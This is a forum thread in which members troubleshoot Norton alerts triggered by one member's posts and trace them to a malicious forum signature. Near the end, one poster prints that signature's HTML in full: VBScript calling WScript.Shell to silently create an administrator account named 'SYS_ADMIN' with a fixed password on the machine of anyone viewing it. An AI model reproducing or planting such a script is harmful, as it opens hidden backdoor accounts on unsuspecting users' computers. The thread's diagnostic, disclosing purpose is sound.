Still having problems pt 2

[koooky]

Hey guys...still having major problems now. Anything with DLD'post in it lock me up now. That is why I have started a new thread instead of posting in the other one. It also hits when I even try to PM DLD. I have checked everything as well as I can on my end including Nortons and Spybot....anyword?

DLD, how about you email me seperately and see what happens

kooky

 

[millionman]

I haven't had any problems with the site. I scan once or twice a week, and I have no trouble viewing anything posted. I wonder if it's a worm on your system that can't be recognized by norton. We had a worm on my dad's sysytem about a month ago, and it actually prevented norton from updating or scanning, and we had some sort of spyware or worm that had a search bar attached to it and it would scroll up the desktop and say Hello and then the computer would shut down, now that was freaky. That was the craziest thing I have ever seen happen on a computer.

 

[sikdogg]

I run Symantec AntiVirus Corporate Edition with all the updates and haven't experience anything like you've described...

 

[REDZULU2003]

Sounds like your system and others whom have the same problem, which isnt many have security issues that need fixing and I myself cant see any issues here.
Get a new firewall, get a new AV, get your OS updates and get looking into some good sites to boost your computer security.
Perhaps you have a trojan? Do me a quick favour and go into ACCOUNTS [you have windows right?] where you have lists of whoever can use YOUR computer, such as Guest and administrater.
Tell me what you see.

 

[koooky]

What do you suggest then Red if not Norton's? I use it as my Virus software and my firewall. What do you suggest for each? Also, I did as you said and looked at "ACCOUNTS"....There is me(admin) and my daighter(limited acct) and Guest is turned"off"......What are you looking for there. I already had spybot and it never hits anything but I also downloaded ad aware and ran it today and it founfd and eliminated problems it found.

kooky

 

[millionman]

Hey Kooky try downloading microsoft anti-spyware from download.com and let it run in the background along with your anti-virus software, it usually picks up what AS and Spybot S&D miss. Good luck

 

[finalsight]

I think your problem is norton, it has a history of problems for example when i installed it it totally fucked my computer up and i had to reinstall windows.

since then i've been using free AVG antivirus (http://free.grisoft.com/doc/1/lng/us/tpl/v5)

As for spyware i use both adaware and spybot S&D, and have no problems.

Also as for a firewall i use the windows xp SP2 one and everything works fine.

As i said i think your problem is most likely norton, get rid of it, as for the rest follow redz advice he knows what he's talking about when it comes to computers.

 

[koooky]

ok guys....I just ran and updated nortons.
I downloaded and updated and ran AVG virus.
I ran spybot.
I downloaded and ran adaware.

I am now ONLY haveing problems with any of DLD's post. Even when I try to
PM DLD. This is the type of message I am getting..

"HTTP IE Object Type Validation

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description

This signature detects an attempt to exploit a vulnerability in Internet Explorer.

Additional Information

Internet Explorer does not properly handle certain HTTP responses, resulting in the possibility of the execution of a local or loaded piece of software.
The problem occurs when Internet Explorer receives a response from the server when a web page containing an object tag is parsed.
Proper parameter checks of the type of file being loaded are not performed on the object type contained within HTTP response received from the web server.
Successful exploitation of this vulnerability could allow a malicious object to be trusted and as such be installed and executed on the local system.
All code execution would occur in the security context of the current user.
It should be noted that an attacker may be capable of also executing locally installed executables with command-line parameters.
It should also be noted that, the execution of a malicious object could be triggered via any mechanism which uses Internet Explorer for parsing web content, including HTML e-mail.

Affected:

Microsoft Internet Explorer 5.0.1
Microsoft Internet Explorer 5.0.1 SP1
Microsoft Internet Explorer 5.0.1 SP2
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.5 SP1
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 6.0 SP1

Response

Microsoft has posted patches for this issue. They be found from the following bulletin:
Microsoft Security Bulletin MS03-032
Microsoft Internet Explorer does not properly evaluate object types:
Vulnerability Note VU#865940

Possible False Positives

There are no known false positives associated with this signature."


Are you sure there isn't something in DLD sig or something that is hitting this???

kook

 

[millionman]

KOOKY, just download mozilla firefox. IE is vunerable to so many different things and it's such a hassel to try and protect yourself, just use mozilla because it's got it's own virus protection and eleminates trojans according to the most recently updated definitions. It's a solid program, I haven't found one better. Good luck mate

 

[koooky]

Thanks millionman....already done that. I had downloaded that a few weeks ago and it gets hit as well. I don't use IE to beginh with. I am using the most up to dat version of Netscape. What kills me that it ONLY happens in threads with DLD's post in it. Thats it. It happens nowhere else on this site.

kooky

 

[REDZULU2003]

Download something that isnt a IE engine such as Opera, K-Meleon or Mozila.
I asked about the accounts because sometimes when a trojan has access to your system they have accounts created to access it.
Get rid of Norton also, get something like Zone Alarm or Sygate for your firewall and Kaspersky or F-secure for your AV.

 

[wreck]

I have the same problem as koooky!! I'm running -- Windows IE, Norton internet pro, Windows beta spyware -- all updated to newest versions and legal copies.

 

[KingJames]

Get Bazooka. This program finds Worms and trojans that Norton and Spyware doesn't. The only bad thing is you have to manually delete the worm yourself but they give you good instructions. You will find it at www.download.com

Also go to this page http://scan.sygate.com/quickscan.html it will check if all the ports are blocked and they should be.

If all the ports arent blocked then get Sygate Personal Firewall. This firewall is handy as it allows you to totally control it. Might be a bit difficult for Computer Novices.

 

[wreck]

It doesn't seem to be a firewall issue if I disable the Norton firewall and enable the microsoft firewall it still happens.In both internet explorer and mozilla firefox.

Definitely a Norton issue though it is in the "intrusion detection" because it stops if I shut "intrusion detection" down or move the "http-ie-object-type-validation" inclusion to the exclude list in the adv options.

Did the above mention scans all as they should be with no trojans or spys. tnx King

 

[koooky]

Hey wreck...

That is the EXACT problem I have been having. And it has only started recently and only happens in threads with DLD. I have tried another virus program and I also have two different spyware programs with nothing showing up.

kooky

 

[wreck]

I don't think its a virus or a trojan on our computers but something is triggering the alert at first it happened with reds posts I think now DLD's??
Somethings up , Ive run so many different programs and come up with nothing.

The address is 67.15.1.245 - everyone internet, inc. - Houston Texas

 

[koooky]

I agree Wreck. I have run several things myself and I get no viruses or spyware. I think there is something is DLD's post that is triggering it.

I get the same address as well.

kook

 

[wreck]

Kooky go to user cp and shut down everything seems to work for me so far

 

[wreck]

Kooky narrowed it down even farther just shut down "SHOW SIGNATURES" in your user cp under visible post elements!!

 

[koooky]

Where do you see those options? I go to user cp and I don't see that anywhere..



EDIT----

Nevermind....I found it. Let's see how this works....

Thanks wreck.

kooky

 

[koooky]

You are right...I shut everything down and now there are no problems. I have thought since the beginning that it was something in DLD's sig or avatar that was triggering this.

Thanks Wreck...

kooky

 

[wreck]

Koooky and others
Happy that I could help. I was going to work on this issue when it came up with red's posts awhile back but I went on vacation and didnt have time.I may have a thought as to whats causing it but, this is a way around it for now.

All you have to do is disable the "show signatures" in the user cp not everything!!!
This will stop everyone signatures from showing up which is not ideal because I, like most of you like to read and look at them it tells alot about the person

1:Click on "User CP" in the top row next to Chat

2: On the left hand side under Control Panel click on "Edit Options"

3:Scroll down to "Thread Display Options" in the first box labeled "Visible Post Elements" uncheck the box "Show Signatures"

4:Scroll down to the bottom of the page and hit "Save Changes"

5: YOUR DONE

 

[koooky]

Yeah man...I got it to work right after I had posted before. I've been on here a long time and I never even realized that you could shut those sigs off. I have no problems at all now. Maybe DLD could completely change his sig and avatar to see if it still makes Norton's hit on it. What do you think it can be? Any idea at all?

kook

 

[German Stallion]

I went in and turned off all internet security with Norton and then I can read these posts, but if I leave it set as in the past, then it rejects many [words=http://www.mattersofsize.com/join-now.html]mos[/words] threads. It is a Norton issue. I will check out the signature directions as above. Thanks for all the work, you guys. I got tired of rebooting to read each post! GS

 

[koooky]

Hey German....

I was doing the same thing until Wreck suggested going into your "User's CP"
and turning off everyone's sigs...that did it for me. I can leave Norton's on all the
time and still view all the post here.

This only started happening a few weeks ago and I seem to recall a Norton's update before that. Apparently something in DLD's sig or avatar is tripping something in Norton's to shut it down.

kooky

 

[REDZULU2003]

I have been abscent from here recently with work but I have now found the issue thats affecting 'some' members in here.
I'm going to discuss it in the MOD section first before it comes into the public forums so we can fix it....for the time being, stop moaning and bare it.

 

[koooky]

Hey Red...

I'm not moaning....I was just trying to tell German what Wreck had found that worked
for 'some' of us that have been having problems. All I did was shut off all sigs in the user CP and I have no problem with DLD's post now.

kooky

 

[wreck]

Red,
I didn't know that trying to find and help fix a known problem with 'some' active users was moaning. Especially active users like GS, Koooky, Prince Albert and Provider.

How many users with Norton do you think said nothing? Thinking that by coming here they may have got a virus or will get one and may not come back.

Although you believe Norton is s---t and it may be but a whole lot of people use it and after the last update it caused a issue here. When your answers to the questions for help by others were "It's in your computer not on [words=http://www.mattersofsize.com/join-now.html]MoS[/words] so fix your computer", "get rid of IE it's to vulnerable", "stop using Norton antivirus", "run ad ware programs to clean your computer" when we did all that you asked, all great advice I might add and none of it solved the problem what did you expect moaning as you put it or as I call it more questions for help.

respectively
Wreck

 

[koooky]

Thanks Wreck...

Actually, I appreciate you finding a very simple solution to what had become a very big
problem for 'some' of us. I had been saying for quite a while now that I thought it was something in DLD's sig or avatar that was tripping Nortons. I would be very interested into knowing what Red has found could be the problem.

 

[Anon]

For those that are interested, DLD's signature is indeed the problem. It says it right there in the error message someone posted previously. The offending HTML (website code) is:

<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<script language=vbscript>
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user SYS_ADMIN pwd007 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators SYS_ADMIN /add",0)
window.close
</script>

I'll leave it to the imagination as to what this does, and why it is in DLD's signature... and, why the "tech guy" didn't notice it?

It is nothing to do with faulty browsers (although IE is a pile of crap and Firefox is an outstanding alternative), or faulty AVs, or anything else. Switching off signatures will fix it.

PS - for those that wish to know more about IE's WSH vulnerabilities, have a search on Google.

 

[Anon]

Cough... explanation ...cough

 

[koooky]

"I'll leave it to the imagination as to what this does, and why it is in DLD's signature... and, why the "tech guy" didn't notice it?"


Wow...Thanks Anon. But since I am a computer idiot can you explain the whats and whys?

Thanks

kooky

BTW, I went to that web page and still didn't get it

DUH!!!!!!!!!!!!!

Thanks
Kook

 

[Anon]

"...a user named "SYS_ADMIN" with password "pwd007" will be created on the victim's system..."

So, anyone that views DLD's sig with an unsafe browser will get a new user added to their PC.. luckily, most AVs and browsers catch this flaw these days.

 

[koooky]

OK....I got that part. But I am refering to this part, "and why it is in DLD's signature... and, why the "tech guy" didn't notice it?" Also, Is there anyway you can take it out of this thread....this thread(your post) are making Norton's go off again...

kooky

 

[koooky]

Any news on this yet Red? Why would this be in someone's sig file to make a
new user added to their pc with a new password and all. I am very concerned about this and I am very worried as to why I was being told(countless of times) that it was all MY system's fault, and not the fault of this site.

kooky